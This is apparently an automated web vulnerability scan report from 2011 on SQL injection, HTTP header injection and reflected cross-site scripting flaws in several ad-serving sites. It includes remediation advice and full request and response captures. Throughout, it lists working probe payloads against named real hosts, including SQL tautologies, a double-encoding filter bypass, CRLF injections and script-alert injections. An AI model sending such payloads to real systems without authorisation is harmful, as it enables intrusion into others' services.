SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The a parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the a parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The OrganizationID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OrganizationID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Length: 7260 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NON DSP COR CUR TAI PSA IVA IVD HIS OUR DEL SAM OTR UNR STP UNI" Date: Mon, 31 Oct 2011 19:15:13 GMT
<html> <head> <title>Unclosed quotation mark after the character string ''.</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black; ...[SNIP]...
The k cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the k cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the k cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
{"requestCacheSeedData":[],"twttr":{"payload":{"profiling":false,"conditionalTemplates":{}},"isPreflight":false,"languages":[{"css_classes":"western nl","name":"Nederlands","localized_name":"Dutch","c ...[SNIP]... HowToBeAGentleman moves to Saturdays 8:30\/7:30c Beginning October 15th!","screen_name":"How2BeGentleman"},{"name":"Kickstarter","profile_image_url":"http:\/\/a1.twimg.com\/profile_images\/1150349488\/stacked_logo_twitter_2_normal.jpg","id":16186995,"description":"Kickstarter is the world's largest funding platform for creative projects.","screen_name":"kickstarter"},{"name":"OMGFacts","profile_image_url ...[SNIP]...
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the CRID request parameter is copied into the Location response header. The payload 29621%0d%0a6044376590c was submitted in the CRID parameter. This caused a response containing an injected HTTP header.
Request
GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=29621%0d%0a6044376590c&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002 HTTP/1.1 Host: adserver.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10 Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B
Response
HTTP/1.0 302 Moved Temporarily Connection: close Server: Adtech Adserver Cache-Control: no-cache Location: http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=29621 6044376590c&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002 Content-Length: 0
The value of the PLID request parameter is copied into the Location response header. The payload ee682%0d%0a247f36ca75a was submitted in the PLID parameter. This caused a response containing an injected HTTP header.
Request
GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq3710&PLID=ee682%0d%0a247f36ca75a&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002 HTTP/1.1 Host: adserver.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10 Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B
Response
HTTP/1.0 302 Moved Temporarily Connection: close Server: Adtech Adserver Cache-Control: no-cache Location: http://www.coupons.com/alink.asp?go=13306iq3710&PLID=ee682 247f36ca75a&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002 Content-Length: 0
The value of the adlink|3.0|5345|2221988|1|16|AdId request parameter is copied into the Location response header. The payload 39301%0d%0aa06bcb1f098 was submitted in the adlink|3.0|5345|2221988|1|16|AdId parameter. This caused a response containing an injected HTTP header.
Request
GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq371039301%0d%0aa06bcb1f098&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002 HTTP/1.1 Host: adserver.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10 Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B
Response
HTTP/1.0 302 Moved Temporarily Connection: close Server: Adtech Adserver Cache-Control: no-cache Location: http://www.coupons.com/alink.asp?go=13306iq371039301 a06bcb1f098&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002 Content-Length: 0
The value of the cid request parameter is copied into the Location response header. The payload d0a34%0d%0a5f234eb359e was submitted in the cid parameter. This caused a response containing an injected HTTP header.
Request
GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=d0a34%0d%0a5f234eb359e HTTP/1.1 Host: adserver.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10 Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B
Response
HTTP/1.0 302 Moved Temporarily Connection: close Server: Adtech Adserver Cache-Control: no-cache Location: http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=d0a34 5f234eb359e Content-Length: 0
2.5. http://adserver.adtechus.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserver.adtechus.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e0895%0d%0abb178f9989d was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /?adlink|3.0|5345|2221988|1|16|AdId=2141194;BnId=1;link=http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002&e0895%0d%0abb178f9989d=1 HTTP/1.1 Host: adserver.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.coupons.com/couponweb/Register.aspx?pid=13306&zid=iq37&nid=10 Cookie: JEB2=NOID; OptOut=we will not set any more cookies; s_pers=%20s_getnr%3D1316296602252-New%7C1379368602252%3B%20s_nrgvo%3DNew%7C1379368602253%3B
Response
HTTP/1.0 302 Moved Temporarily Connection: close Server: Adtech Adserver Cache-Control: no-cache Location: http://www.coupons.com/alink.asp?go=13306iq3710&PLID=MEDIAADS&CRID=SCJ102411sitewrap&cid=16362179~16362182~16362184~16362186~16362373~16362376~16362378~16362382~16362387~16362391~16362395~16362398~16363002&e0895 bb178f9989d=1 Content-Length: 0
The value of the exch request parameter is copied into the x-mm-debug response header. The payload 487b6%0d%0a27da486a7cd was submitted in the exch parameter. This caused a response containing an injected HTTP header.
The value of REST URL parameter 2 is copied into the Location response header. The payload a5eaf%0d%0a2b3fff9103d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
The value of REST URL parameter 3 is copied into the Location response header. The payload fe03b%0d%0a0d2db46717e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8238c'-alert(1)-'538769bc1ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11e3'-alert(1)-'0e24c47d29 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.3. http://a.collective-media.net/adj/q1.politico/home_run_of [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.politico/home_run_of
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6dba'-alert(1)-'acda2ebf641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f1b8'-alert(1)-'b862447dec9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 870f0'-alert(1)-'681d43366b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Tue, 01 Nov 2011 01:28:58 GMT Content-Length: 7318 Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30211278520_1320110938","http://ad.doubleclick.net/adj870f0'-alert(1)-'681d43366b4/q1.politico/home_run_of;net=q1;u=,q1-30211278520_1320110938,,polit,;;sz=728x90;net=q1;ord1=321368;cmw=owl;contx=polit;dc=s;btg=;ord=4779871?","728","90",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 295a1'-alert(1)-'e04023ad0ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Tue, 01 Nov 2011 01:28:58 GMT Content-Length: 7318 Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30106793610_1320110938","http://ad.doubleclick.net/adj/q1.politico295a1'-alert(1)-'e04023ad0ea/home_run_of;net=q1;u=,q1-30106793610_1320110938,,polit,;;sz=728x90;net=q1;ord1=321368;cmw=owl;contx=polit;dc=s;btg=;ord=4779871?","728","90",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 407fd'-alert(1)-'75fed897780 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Tue, 01 Nov 2011 01:28:59 GMT Content-Length: 7318 Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30315246489_1320110939","http://ad.doubleclick.net/adj/q1.politico/home_run_of407fd'-alert(1)-'75fed897780;net=q1;u=,q1-30315246489_1320110939,,polit,;;sz=728x90;net=q1;ord1=321368;cmw=owl;contx=polit;dc=s;btg=;ord=4779871?","728","90",true);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb6ff'-alert(1)-'c85e9da208c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Tue, 01 Nov 2011 01:28:56 GMT Content-Length: 7303 Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30306502843_1320110936","http://ad.doubleclick.net/adj/q1.politico/home_run_of;net=q1;u=,q1-30306502843_1320110936,,none,;;sz=fb6ff'-alert(1)-'c85e9da208c;cmw=nurl;contx=none;dc=s;btg=?","fb6ff'-alert(1)-'c85e9da208c","",true);</scr'+'ipt> ...[SNIP]...
3.9. http://ad.coupons.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.coupons.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91333"-alert(1)-"e457910bfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b83c"><script>alert(1)</script>920bf81711c was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0264"><script>alert(1)</script>a3a5e653a48 was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.12. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.yieldmanager.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1418"-alert(1)-"a3622220cf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Tue, 01 Nov 2011 01:42:25 GMT Server: YTS/1.19.8 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Tue, 01 Nov 2011 01:42:25 GMT Pragma: no-cache Age: 0 Proxy-Connection: keep-alive Content-Length: 4266
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&anmember=541&anprice=&b1418"-alert(1)-"a3622220cf1=1&referrer=http%3a%2f%2fwww.politico.com%2findex.html&s=1921728&_salt=3327376166";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Ar ...[SNIP]...
3.13. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.yieldmanager.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6607a"><script>alert(1)</script>fedfa55f3ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Tue, 01 Nov 2011 02:13:58 GMT Server: YTS/1.19.8 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Tue, 01 Nov 2011 02:13:58 GMT Pragma: no-cache Age: 0 Proxy-Connection: keep-alive Content-Length: 4607
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id= ...[SNIP]... <a href="http://ad.yieldmanager.com/imageclick?6607a"><script>alert(1)</script>fedfa55f3ca=1&Z=728x90&s=2300359&_salt=467812189&t=2" target="_parent"> ...[SNIP]...
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 825f5'-alert(1)-'bc1f7844b9a was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:42:37 GMT Content-Length: 496
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76292'-alert(1)-'5914a4e1bc was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Content-Type: text/javascript Date: Tue, 01 Nov 2011 01:42:46 GMT Content-Length: 494
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7417d<script>alert(1)</script>4dfdaf9fc1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 83e9a<script>alert(1)</script>69ceae6dc70 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Tue, 01 Nov 2011 01:30:51 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2529
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "120176783e9a<script>alert(1)</script>69ceae6dc70"
The value of the placementId request parameter is copied into an HTML comment. The payload c7df2--><script>alert(1)</script>aa10569b39e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
